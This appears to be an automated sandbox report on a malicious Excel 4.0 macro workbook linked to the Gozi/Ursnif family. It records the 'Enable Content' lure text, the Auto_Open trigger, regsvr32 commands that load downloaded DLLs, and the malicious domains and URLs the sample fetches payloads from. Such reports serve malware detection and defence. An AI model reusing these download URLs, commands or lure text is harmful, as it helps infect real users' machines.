Analysis Report 12345.xlsm

Overview

General Information

Sample Name:	12345.xlsm
Analysis ID:	382553
MD5:	5851c6423d6cffdbfdd9ce4276592acb
SHA1:	8992a00647a35e67a887127b5aa7269cc9c597c6
SHA256:	a7893081be92e7c0c1672482df252f282abca98ff09ff559f246bcc5244d74c3
Tags:	GGGoziISFBUrsnifxlsm
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Allocates a big amount of memory (probably used for heap spraying)

Excel documents contains an embedded macro which executes code when the document is opened

IP address seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Uses a known web browser user agent for HTTP communication

Yara detected Xls With Macro 4.0

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: 12345.xlsm

ReversingLabs: Detection: 16%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 126MB

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: velma-harber30ku.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 8.211.4.209:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 8.211.4.209:80

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 103.205.143.227 103.205.143.227
Source: Joe Sandbox View	IP Address: 8.211.4.209 8.211.4.209
Source: Joe Sandbox View	IP Address: 74.208.236.90 74.208.236.90

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /gg.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: velma-harber30ku.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gg.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laura9630fr.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gg.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mills-skyla30ec.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: moumitas.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jacktech.jackindia.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\699323C9.png

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /gg.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: velma-harber30ku.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gg.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laura9630fr.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gg.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mills-skyla30ec.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: moumitas.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jacktech.jackindia.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: velma-harber30ku.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 06 Apr 2021 07:48:01 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 74Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.

Source: regsvr32.exe, 00000003.00000002.2093312611.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093803930.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2094400807.0000000001D80000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2094974245.0000000001C80000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2096134178.0000000001C30000.00000002.00000001.sdmp

String found in binary or memory: http://servername/isapibackend.dll

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 4	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Screenshot number: 8	Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 8	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU

Found Excel 4.0 Macro with suspicious formulas

Source: 12345.xlsm

Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Source: 12345.xlsm

Initial sample: Sheet size: 30888

Excel documents contains an embedded macro which executes code when the document is opened

Source: workbook.xml

Binary string: " sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$BO$133</definedName></definedNames><calcPr calcId="122211"/></workbook>

Source: classification engine

Classification label: mal72.expl.evad.winXLSM@11/10@5/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$12345.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC947.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 12345.xlsm

ReversingLabs: Detection: 16%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf1.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf2.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf3.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf4.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf1.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf2.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf3.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf4.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 12345.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: 12345.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: 12345.xlsm	Initial sample: OLE zip file path = xl/media/image3.png
Source: 12345.xlsm	Initial sample: OLE zip file path = xl/media/image4.png
Source: 12345.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: 12345.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 12345.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Registers a DLL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.205.143.227	jacktech.jackindia.com	India	132335	NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN	false
8.211.4.209	laura9630fr.com	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
74.208.236.90	moumitas.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	false

Contacted Domains

Name	IP	Active
laura9630fr.com	8.211.4.209	true
mills-skyla30ec.com	8.211.4.209	true
jacktech.jackindia.com	103.205.143.227	true
velma-harber30ku.com	8.211.4.209	true
moumitas.com	74.208.236.90	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://velma-harber30ku.com/gg.gif	false	Avira URL Cloud: safe	unknown
http://mills-skyla30ec.com/gg.gif	false	Avira URL Cloud: safe	unknown
http://jacktech.jackindia.com/ds/0204.gif	false	Avira URL Cloud: safe	unknown
http://moumitas.com/ds/0204.gif	false	Avira URL Cloud: safe	unknown
http://laura9630fr.com/gg.gif	false	Avira URL Cloud: safe	unknown

ID:	382553
Product:	CloudBasic
Start time:	09:47:08
Start date:	06.04.2021
Sample:	12345.xlsm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	5851c6423d6cffdbfdd9ce4276592acb
SHA1:	8992a00647a35e67a887127b5aa7269cc9c597c6
SHA256:	a7893081be92e7c0c1672482df252f282abca98ff09ff559f246bcc5244d74c3
Filetype:	Excel Microsoft Office Open XML Format document (40004/1) 83.33%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\699323C9.png	PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced	D8574C9CC4123EF67C8B600850BE52EE	5547AC473B3523BA2410E04B75E37B1944EE0CCC	ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\761041BF.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	02DB1068B56D3FD907241C2F3240F849	58EC338C879DDBDF02265CBEFA9A2FB08C569D20	D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B5BE736.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	A516B6CB784827C6BDE58BC9D341C1BD	9D602E7248E06FF639E6437A0A16EA7A4F9E6C73	EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4AC70B4.png	PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced	780FD0ABF9055E2D8FA1BAB6D4B9163E	CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE	6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
C:\Users\user\AppData\Local\Temp\91DE0000	data	050A914F070781F5D082643D109AC64B	19454C889848ACEE4AB57B46D558D9F7559057C6	8F3F5D498B2A305BFC71CF3B9C36575AA534FB2B4385033DF802E0951F087B73
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\12345.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Apr 6 15:47:39 2021, atime=Tue Apr 6 15:47:39 2021, length=95644, window=hide	A42E1B2F2EB49399030FF949E1FD9AA7	E549D5FDAB738F24C17AEC23D61D65C03095C78D	B9565B4E5D4619DA0F545F7B203C1E02D4C42DDAE508CC6E7CF4C9BF04C95921
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Apr 6 15:47:39 2021, atime=Tue Apr 6 15:47:39 2021, length=12288, window=hide	17C5ED0D3A4A2A9F20A997F68242EE84	82196D6FC7570C3DE1D7614294EB4F3B70330846	44E7F9FEBF8656BFE856E002228F3D57C23D2CE704C1235D25F4FA3C8ECA0A5D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	8D90BE2693870D9F8B85B2F981628B31	F1EA8A5440EFA7E99E91415481FC9DD89EF0D2E7	AD0BDAAB996D0966EF9B85AED4713407724A2889AB06755E43E76103570E7AC9
C:\Users\user\Desktop\A2DE0000	data	050A914F070781F5D082643D109AC64B	19454C889848ACEE4AB57B46D558D9F7559057C6	8F3F5D498B2A305BFC71CF3B9C36575AA534FB2B4385033DF802E0951F087B73
C:\Users\user\Desktop\~$12345.xlsm	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523

Analysis Report 12345.xlsm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs